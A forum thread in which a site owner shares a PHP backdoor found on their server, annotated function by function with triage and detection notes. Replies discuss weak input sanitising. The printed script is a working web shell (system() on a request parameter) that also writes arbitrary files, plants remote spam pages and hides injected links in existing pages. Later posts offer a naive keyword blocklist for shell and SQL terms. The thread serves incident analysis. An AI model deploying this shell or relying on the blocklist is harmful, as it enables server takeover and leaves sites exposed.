
It's been a while since I've had a security breach, but here's something I found on my server today. I'm assuming it is a brute-force attack on the login form, and it's trying to write to .htaccess (permissions now 444).

 

 

Any ideas on what else it might do??

 

<?php
// Keep executing after the requesting client disconnects, and lift the
// max_execution_time cap. The generation functions below (Gen/Gen2/GenNew)
// perform many sequential fopen() reads, so this is presumably there to let a
// whole batch finish from a single request. Neither call has a legitimate role
// in a normal request handler; both are worth flagging when auditing a web root.
ignore_user_abort(1);
set_time_limit(0);

// Removes the script's own state files from the current directory:
// "c" (directory name and counters persisted by Gen/Gen2/GenNew),
// "1r.txt" / "2r.txt" (lists of generated page paths) and "log" (not written
// by any function visible in this file). Reached from Main() when a request
// carries parameter "cl". unlink() results are ignored, so a missing file is
// silent.
// Incident note: these four filenames next to this script are artefacts to
// collect before cleanup; a "cl" request in the access log means they were
// deliberately wiped.
function Clear()
{
unlink("c");
unlink("1r.txt");
unlink("2r.txt");
  unlink("log");
}

// Reverts the page modification made by MRepl(): the target page's name is read
// from the file "m", the page is opened one directory up ("../<name>"), the
// injected <dd4>…<dd5> and <!--dd4-->…<!--dd5--> spans, any <a> tag containing
// "_lm" in its attributes, any "http…tmp6…</a>" run and the zero-size hidden
// <font> wrapper are stripped, and the page is written back. Echoes " upt-ok".
// Reached from Main() for parameter "cl2".
// Triage notes: ereg_replace() was removed in PHP 7, so this code only runs on
// PHP 5. The marker strings ("<dd4>", "<!--dd4-->") and the hidden-font style
// are reliable search keys for finding pages this script has touched.
function Clear2()
{
$mrd = trim(file_get_contents("m"));
$pt = "../$mrd";
$fin = file_get_contents($pt);
$fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
  $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
$fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); 
$fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
$fin = ereg_replace("<!--dd4-->", "", $fin);
  $fin = ereg_replace("<!--dd5-->", "", $fin);
  $fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin);
// Rewrite the page in place; no backup is kept, and fopen() failure is not checked.
$fmrd = fopen($pt, "w+");
fwrite($fmrd, $fin);
fclose($fmrd);
echo " upt-ok";
}

// Reads request parameter $name into $var (by reference), taking $_POST first
// and letting a $_GET value of the same name override it. Returns true when a
// non-empty value was found, false otherwise. No validation of any kind is
// applied to the value. Only MRepl() calls this; the other functions read the
// superglobals directly.
function GetVar($name, &$var)
{
$var = "";
if (isset($_POST[$name]))
	$var = $_POST[$name];

  if (isset($_GET[$name]))
	$var = $_GET[$name];

if (($var) =="")
  return  false;
  else return true;
}


// Page-generation routine, reached from Main() for parameter "g1".
// Takes a path/URL prefix in parameter "sg" ($_GET overrides $_POST) and reads
// everything it writes from "<sg>2.txt" and "<sg>sgen.php" via fopen(); with
// allow_url_fopen enabled this fetches from a remote host, which is what the
// query strings appended in Gen()/Gen2() indicate is intended.
// First run: creates a directory with a random 5-letter name, records it in
// the file "c", and writes a .htaccess inside it from "<sg>2.txt".
// Every run: ten times, fetches "<sg>sgen.php", splits the response on
// "</html>", uses the trailing fragment as a page name, creates
// "<dir>/<name>/<name>.php" with the response and logs the path to "1r.txt".
// Triage notes: a 5-letter random directory holding a .htaccess and
// single-file subdirectories is the footprint to look for; the mtime of "c"
// dates the first run. Defects visible here: $pid is never assigned on the
// "c"-exists branch (null, so the loop still runs 0..9); $fr and $fconf are
// never closed; fopen() results are never checked, so a failed fetch produces
// warnings and empty files rather than aborting.
function GenNew()
{
$alp = "abcdefghiklmnjsweqrtyuiopzx";
$maps = array();
if (isset($_POST["sg"]))
	$sg = $_POST["sg"];

  if (isset($_GET["sg"]))
	$sg = $_GET["sg"]; 

$path = "";
$fr = fopen("1r.txt", "a+");
if (file_exists("c"))
{
	$fconf = file("c");
	$tname = trim($fconf[0]);
}
else 
{
	$fconf = fopen("c", "w+");
	$rnd = mt_rand(0, 999);
	$nm = "";
  for ($i=0; $i<5; $i++)
	{
		$ran = mt_rand(0,26);
		$sym = $alp[$ran];
		$nm = $nm.$sym;
	}
	$tname = $nm;
    mkdir($tname);
    fwrite($fconf, $tname);
	$pid = 0;
	// .htaccess content comes from the "sg" source, not from this script.
	$fht = fopen("$tname/.htaccess", "w+");

	$htname = $sg."2.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
		 $fc = fgets($fp, 1024);
		 if (!$fc) break;
	   $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht); 
}
  $gname = $sg."sgen.php";
for ($j=$pid; $j<$pid+10; $j++)
{
    
	$fc = ""; 
	$fp = fopen($gname, "r");
	$fin = '';
	while (!feof($fp))
	{
		 $fc = fgets($fp, 1024);
		 if (!$fc) break;
	   $fin .= $fc;
	}
	fclose($fp);

	// The page name is whatever the source appends after "</html>".
	$arr = explode("</html>", $fin);
	//print_r($arr);
	$curs = trim($arr[1]);

	$newf = "$tname/$curs/";
	echo "$newf";
	mkdir($newf);
	$fnd = fopen("$tname/$curs/$curs".".php", "w+");
	fwrite($fnd, $fin);
	fclose($fnd);
	fwrite($fr, "$tname/$curs/$curs".".php\n");


}

}

// Second page-generation routine, reached from Main() for parameter "g2".
// Like GenNew() it reads a prefix from "sg" and fetches all content through
// fopen() on "<sg>…" names; the "?th=…" query string appended below only makes
// sense for a URL, so the source is expected to be a remote host.
// First run: creates a random 5-letter directory, records its name and a
// counter of 0 in "c", and fills it with a .htaccess (from "<sg>2.txt") and a
// "2.js" (from "<sg>2js.txt"); also saves "<sg>1t.php" locally as "1t", a list
// of 300 page names consumed one per generated page.
// Every run: ten times, takes the next name from "1t", fetches
// "<sg>sgen2.php?th=<name>", replaces the "<LINKS2>" placeholder with a list of
// links to other generated pages, and writes "<dir>/<name>.php". Pages 196–199
// get a fixed 75-entry slice of the list (index pages); all others get 22
// random entries. With parameter "md" present, index pages are logged to
// "1r.txt" and the rest to "2r.txt". The advanced counter is written back to
// "c" so the next request continues where this one stopped.
// Triage notes: "1t", "2.js", "2r.txt" and a directory of 300 interlinked
// pages are the artefacts; the counter in "c" tells how far generation got.
// Visible defects: $pid is unset on the "c"-exists branch (null, loop still
// runs ten times); $fr/$f2r and the first $fconf handle are never closed;
// fopen() results are unchecked; $sg is undefined if the parameter is absent.
function Gen2()
{
$alp = "abcdefghiklmnjsweqrtyuiopzx";
$maps = array();
$md = false;
if (isset($_POST["sg"]))
	$sg = $_POST["sg"];

     if (isset($_GET["sg"]))
	$sg = $_GET["sg"]; 

     if (isset($_GET["md"]))
       $md = true; 

$path = "";
$fr = fopen("1r.txt", "a+");
$f2r = fopen("2r.txt", "a+");
if (file_exists("c"))
{
	$fconf = file("c");
	$tname = trim($fconf[0]);
	$i_dor = trim($fconf[1]);
	// "+0" coerces the counter read from "c" to a number.
	$i_dor = $i_dor+0;
}
else 
{
	$fconf = fopen("c", "w+");
	$rnd = mt_rand(0, 999);
 	$nm = "";
    for ($i=0; $i<5; $i++)
 	{
		$ran = mt_rand(0,26);
		$sym = $alp[$ran];
		$nm = $nm.$sym;
	}
	$tname = $nm;
        mkdir($tname);
        fwrite($fconf, $tname."\n");
        fwrite($fconf, "0\n");
	$pid = 0;
	$fht = fopen("$tname/.htaccess", "w+");
	$htname = $sg."2.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
		 $fc = fgets($fp, 1024);
		 if (!$fc) break;
	   $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht); 


$fht = fopen("$tname/2.js", "w+");
	$htname = $sg."2js.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
		 $fc = fgets($fp, 1024);
		 if (!$fc) break;
	   $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht); 



	// Local copy of the page-name list; indexed by $i_dor below.
	$f1t = fopen("1t", "w+");
	$f1tname = $sg."1t.php";
	$fp = fopen($f1tname, "r");
	$fin = '';
	while (!feof($fp))
	{
	   $fc = fgets($fp, 1024);
	   if (!$fc) break;
	     $fin .= $fc;
	}
	fclose($fp);
	fwrite($f1t, $fin);
	fclose($f1t); 


}
// Net no-op on the counter (leftover from editing, presumably).
$i_dor++;
$i_dor--;
$a1t = file("1t");
    $gname = $sg."sgen2.php";
for ($j=$pid; $j<$pid+10; $j++)
{

	$cth = trim($a1t[$i_dor]);
	$i_dor++;
	$fc = ""; 
	// Query string on a fopen() target: the source is expected to be a URL.
	$fp = fopen($gname."?th=$cth", "r");
	$fin = '';
	while (!feof($fp))
	{
		 $fc = fgets($fp, 1024);
		 if (!$fc) break;
	   $fin .= $fc;
	}
	fclose($fp);


		$links ="";

	// Ordinary pages: 22 links to random entries of the 300-name list.
 	if (($i_dor<196) || ($i_dor>199))
	{
		for ($y=0; $y<22; $y++)
		{
			$rndi = mt_rand(0,299);
			$rth = trim($a1t[$rndi]);
			$links .= "<li> <a href='$rth.php'>$rth</a> </li> \n";
		}
	}


	// Pages 196-199: four fixed 75-entry slices covering the whole list.
	if ($i_dor==196)
	{
		for ($y=0; $y<75; $y++)
		{
			$rth = trim($a1t[$y]);
			$links .= "<li> <a href='$rth.php'>$rth</a> </li> \n";
		}
	}
	if ($i_dor==197)
	{
		for ($y=75; $y<150; $y++)
		{
			$rth = trim($a1t[$y]);
			$links .= "<li> <a href='$rth.php'>$rth</a> </li> \n";
		}
	}
	if ($i_dor==198)
	{
		for ($y=150; $y<225; $y++)
		{
			$rth = trim($a1t[$y]);
			$links .= "<li> <a href='$rth.php'>$rth</a> </li> \n";
		}
	}
	if ($i_dor==199)
	{
		for ($y=225; $y<300; $y++)
		{
			$rth = trim($a1t[$y]);
			$links .= "<li> <a href='$rth.php'>$rth</a></li> \n";
		}
	}
	$fin = ereg_replace("<LINKS2>", $links, $fin);
  
$curs = $cth;
$fnd = fopen("$tname/$curs".".php", "w+");
fwrite($fnd, $fin);
fclose($fnd);
if (($md) && ($i_dor==196 || $i_dor==197 ||  $i_dor==198 || $i_dor==199))
{
	fwrite($fr, "$tname/$curs".".php\n");
}
if (($md) && ($i_dor<196 || $i_dor>199) )
{
	fwrite($f2r, "$tname/$curs".".php\n");
}
}

// Persist directory name and counter for the next request.
$fconf = fopen("c", "w+");
fwrite($fconf, $tname."\n".$i_dor."\n");
fclose($fconf);
}

// Original page-generation routine, reached from Main() for parameter "g".
// Reads the source prefix from "sg" and a page keyword from "gm" ($_GET wins
// over $_POST for both). State in "c" is four lines: top directory, current
// 3-letter subdirectory, current keyword, and the next page index.
// First run: random 5-letter top directory with a .htaccess from "<sg>2.txt",
// plus a random 3-letter subdirectory. When the index reaches 100 a fresh
// 3-letter subdirectory is started and the keyword from "gm" is adopted.
// Every run: ten pages "<top>/<sub>/<keyword>_<n>.php", each fetched from
// "<sg>sgen.php?g=<keyword>" (a query string, so a URL source is expected).
// After the 100th page an extra "<keyword>_lm.php" is fetched with "&m=1"
// and its path logged to "1r.txt". The four-line state is rewritten to "c".
// Triage notes: the "<top>/<3-letter>/<word>_<n>.php" naming is the footprint;
// "1r.txt" lists the "_lm" pages. Visible defects: $g is undefined when "gm"
// is absent; $fr is never closed; fopen() results are unchecked; the "_lm"
// branch fires only when the loop ends exactly at $j == 100.
function Gen()
{
$alp = "abcdefghiklmnjsweqrtyuiopzx";
$maps = array();
if (isset($_POST["sg"]))
	$sg = $_POST["sg"];

  if (isset($_GET["sg"]))
	$sg = $_GET["sg"]; 

if (isset($_POST["gm"]))
	 $g = $_POST["gm"];

if (isset($_GET["gm"]))
	$g = $_GET["gm"];


$path = "";
$fr = fopen("1r.txt", "a+");
if (file_exists("c"))
{
	$fconf = file("c");
	$tname = trim($fconf[0]);
	$cname = trim($fconf[1]);
	$curs = trim($fconf[2]);
	$pid = trim($fconf[3]);
	// Roll over to a new 3-letter subdirectory every 100 pages.
	if ($pid == 100)
	{
		$pid = 0;
		$rnd = mt_rand(0, 999);
		$nm = "";
    for ($i=0; $i<3; $i++)
  	{
	  	$ran = mt_rand(0,26);
	  	$sym = $alp[$ran];
	  	$nm = $nm.$sym;
	  }
		$cname = $nm;
		mkdir("$tname/$cname");
		$curs = $g;
	}
}
else 
{
	$rnd = mt_rand(0, 999);
	$nm = "";
  for ($i=0; $i<5; $i++)
	{
		$ran = mt_rand(0,26);
		$sym = $alp[$ran];
		$nm = $nm.$sym;
	}
	$tname = $nm;
	$pid = 0;
	$curs = $g;
	mkdir($tname);
	$fht = fopen("$tname/.htaccess", "w+");
	$htname = $sg."2.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
		 $fc = fgets($fp, 1024);
		 if (!$fc) break;
	   $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht);
	$rnd = mt_rand(0, 999);
	$nm = "";
    for ($i=0; $i<3; $i++)
  	{
  	$ran = mt_rand(0,26);
  	$sym = $alp[$ran];
  	$nm = $nm.$sym;
  }
	$cname = $nm;
mkdir("$tname/$cname");
}
  $gname = $sg."sgen.php";
for ($j=$pid; $j<$pid+10; $j++)
{
	$fp = fopen($gname."?g=$curs", "r");
	$fin = '';
	while (!feof($fp))
	{
		 $fc = fgets($fp, 1024);
		 if (!$fc) break;
	   $fin .= $fc;
	}
	fclose($fp);

	$fnd = fopen("$tname/$cname/$curs"."_$j.php", "w+");
	fwrite($fnd, $fin);
	fclose($fnd);
}

// Only true when this batch ran indices 90..99.
if ($j==100)
{
  $fp = fopen($gname."?g=$curs&m=1", "r");
	$fin = '';
	while (!feof($fp))
	{
		 $fc = fgets($fp, 1024);
		 if (!$fc) break;
	   $fin .= $fc;
	}
	fclose($fp);
	$fnd = fopen("$tname/$cname/$curs"."_lm.php", "w+");
	fwrite($fnd, $fin);
	fclose($fnd);
	// $path is always "" here, so the logged path starts with "/".
	$map = "$path/$tname/$cname/$curs"."_lm.php";
	fwrite($fr,"$map\n");
}

$fconf = fopen("c", "w+");
fwrite($fconf, $tname."\n");
fwrite($fconf, $cname."\n");
fwrite($fconf, $curs."\n");
$nj = $j;
fwrite($fconf, $nj."\n");
fclose($fconf);

}

// Arbitrary file write, reached from Main() for parameter "u" (checked before
// every other parameter). Copies whatever fopen() returns for the value of "u"
// — a local path, or a URL when allow_url_fopen is on — into "<name>.php" in
// the script's own directory, where "name" is taken from $_GET. Neither value
// is validated, so this can drop new PHP files or overwrite this script.
// Triage notes: requests carrying "u=" in the access log identify the source
// and the written file; compare file mtimes in this directory against those
// request times. Visible defects: $sname is undefined when "name" is absent
// (target becomes ".php"); $fp is unchecked, so a failed open yields warnings
// and an empty target file.
function Update()
{
if (isset($_GET["name"]))
	$sname = $_GET["name"];

$thisname = "$sname.php";
if (isset($_POST['u']))
  $u = $_POST['u'];
  
if (isset($_GET['u']))
		$u = $_GET['u'];

	$fp = fopen($u, "r");
  $fin = '';
	while (!feof($fp))
	{
		 $fc = fgets($fp, 1024);
		 if (!$fc) break;
	   $fin .= $fc;
	}
  fclose($fp);
  
  $fthis = fopen($thisname, "w+");
  fwrite($fthis, $fin);
  fclose($fthis);
}

// Remote command execution: the raw value of request parameter "c" (POST, then
// GET) is passed to system(), with "@" hiding any error. This function alone
// makes the file a web shell; everything the web server's account can do, a
// request to this script could do.
// Response notes: treat the host as compromised rather than just removing the
// file — anything reachable from the web server's account (config files with
// database/FTP credentials, other vhosts, cron) is in scope, and access-log
// entries for this script with "c=" show what was run. PHP's
// disable_functions (system, exec, shell_exec, passthru, proc_open) limits
// this class of backdoor at the platform level.
function Com()
{
if (isset($_POST['c']))
  @system($_POST['c']);
  if (isset($_GET['c']))
	@system($_GET['c']);
}

// Injects hidden content into an existing page, reached from Main() for
// parameter "s". The target page name is read from the file "m" and opened
// one directory up ("../<name>"); its closing </body> and </html> tags and any
// earlier <dd4>…<dd5> / <!--dd4-->…<!--dd5--> block are removed, then the
// content fetched from the "mpt" parameter (via GetVar → fopen) is appended
// inside a zero-size, overflow-hidden <font> element between "<dd4>" and
// "<dd5>" markers, followed by fresh </body></html>. The page is rewritten in
// place. Clear2() is the inverse operation.
// Triage notes: pages containing "<dd4>" or the style string
// "position: absolute;overflow: hidden;height: 0;width: 0" have been modified
// by this; the file "m" names the most recent target. The injected text is
// invisible in a browser but present in the served HTML.
// Visible defects: a false fgets() result calls exit() mid-loop, leaving $fp
// open and the page unwritten; fopen() results are unchecked; no backup of
// the original page is kept.
function MRepl()
{
$mpt = "";
$drs = "";
$begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">"; 
  $endtag = "</font></body></html><dd5> "; 
$mrd = trim(file_get_contents("m"));
$pt = "../$mrd";
$fin = file_get_contents($pt);
GetVar("mpt", $mpt);
 // (original comment here was mis-encoded and unreadable)
  $fin = preg_replace ("/<\/body>/i", "", $fin);
  $fin = preg_replace ("/<\/html>/i", "", $fin);
  $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
  $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
$fp = fopen($mpt, "r");
  $drs = '';
while (!feof($fp))
{
	 $fc = fgets($fp, 1024);
	 if (!$fc) 
	 {  
       exit();
	 }
   $drs .= $fc;
}
  fclose($fp);
  $fin = $fin.$begtag;  
  $fin = $fin.$drs;
  $fin = $fin.$endtag; 
  $fmrd = fopen($pt, "w+");
fwrite($fmrd, $fin);
fclose($fmrd);
}


// Write test, reached from Main() for parameter "wr": fetches "<wr>w.txt"
// through fopen() and writes its content to a local "w.txt". Presumably used
// to confirm that the script's directory is writable and that the fetch path
// works before running the generators. Reads $_GET['wr'] only — a POST value
// is accepted by Main() but ignored here, so $path would be null in that case.
// Triage note: a stray "w.txt" beside this script is a sign the test ran.
function WrTest()
{
$path = trim($_GET['wr']);
$htname = $path."w.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
		 $fc = fgets($fp, 1024);
		 if (!$fc) break;
	   $fin .= $fc;
	}
	fclose($fp);
;
$fout = fopen("w.txt", "w+");
fwrite($fout, $fin);
fclose($fout);

}


// Request dispatcher. The first matching parameter (POST or GET) wins, in this
// order: "u" → Update() (file write), "c" → Com() (command execution),
// "g" → Gen(), "g1" → GenNew(), "g2" → Gen2() (page generators),
// "s" → MRepl() (page injection), "cl" → Clear(), "cl2" → Clear2() (cleanup),
// "wr" → WrTest() (write test). Each handler is followed by exit(), so exactly
// one runs per request. With none of these present the script prints "<ok>",
// which serves as a liveness check for whoever controls it.
// Detection note: these nine parameter names, on a request to a file that
// should not exist, are the access-log signature of this script; a body of
// exactly "<ok>" in a response is another.
function Main()
{
if (isset($_POST['u']) || isset($_GET['u']))
{
	Update();
	exit();
}



if (isset($_POST['c']) || isset($_GET['c']))
{
	Com();
	exit();
}

if (isset($_POST['g']) || isset($_GET['g']))
{
	Gen();
	exit();
}

if (isset($_POST['g1']) || isset($_GET['g1']))
{
	GenNew();
	exit();
}


if (isset($_POST['g2']) || isset($_GET['g2']))
{
	Gen2();
	exit();
}

if (isset($_POST['s']) || isset($_GET['s']))
{
	MRepl();
	exit();
}

  if (isset($_POST['cl']) || isset($_GET['cl']))
{
	Clear();
	exit();
}

if (isset($_POST['cl2']) || isset($_GET['cl2']))
{
	Clear2();
	exit();
}
	if (isset($_POST['wr']) || isset($_GET['wr']))
{
	WrTest();
	exit();
}

echo "<ok>";

}

// Entry point: every request to this file goes straight to the dispatcher.
Main();

?>


Well, for one thing, you aren't validating any GET or POST variables — at least, not in that script.

 

I use strip_tags and str_replace to sanitize it, and I know that's not nearly enough. I've added this; I'll see if that stops it:

 

        $username = substr(trim($_POST['username']),0,20);        
        //      prevent SQL-injection         
        $username = str_replace('\\','\\\\', $username);     
        $username = str_replace('"','\"', $username);   
        
        //	prevent XSS-attack, Shell-execute and JavaScript execution
        if (preg_match("/cmd|CREATE|DELETE|DROP|eval|EXEC|File|INSERT|printf/i",$username)) {
            $username = '';        
        }
        if (preg_match("/LOCK|PROCESSLIST|SELECT|shell|SHOW|SHUTDOWN/i",$username)) {
            $username = '';        
        }
        if (preg_match("/SQL|SYSTEM|TRUNCATE|UNION|UPDATE|DUMP/i",$username)) {
            $username = '';        
        }
         if (preg_match("/java|vbscri|embed|onclick|onmouseover|onfocus/i",$username)) {
            $username = '';        
        }

        $password = substr(trim($_POST['password']),0,20);
        //      prevent SQL-injection         
        $password = str_replace('\\','\\\\', $password);     
        $password = str_replace('"','\"', $password);   
        
        //	prevent XSS-attack, Shell-execute and JavaScript execution
        if (preg_match("/cmd|CREATE|DELETE|DROP|eval|EXEC|File|INSERT|printf/i",$password)) {
            $password = '';        
        }
        if (preg_match("/LOCK|PROCESSLIST|SELECT|shell|SHOW|SHUTDOWN/i",$password)) {
            $password = '';        
        }
        if (preg_match("/SQL|SYSTEM|TRUNCATE|UNION|UPDATE|DUMP/i",$password)) {
            $password = '';        
        }
         if (preg_match("/java|vbscri|embed|onclick|onmouseover|onfocus/i",$password)) {
            $password = '';        
        }


If someone got a file on your server, it obviously wasn't through SQL injection.

 

 

I don't get how they can add not only a PHP file but a directory; my FTP password is 20 mixed characters, and I change it every 3 months.

 

I clean POST, GET and request values using strip_tags and str_replace, and database queries with mysql_real_escape_string().

 

I'm out of ideas on how else they could do it.


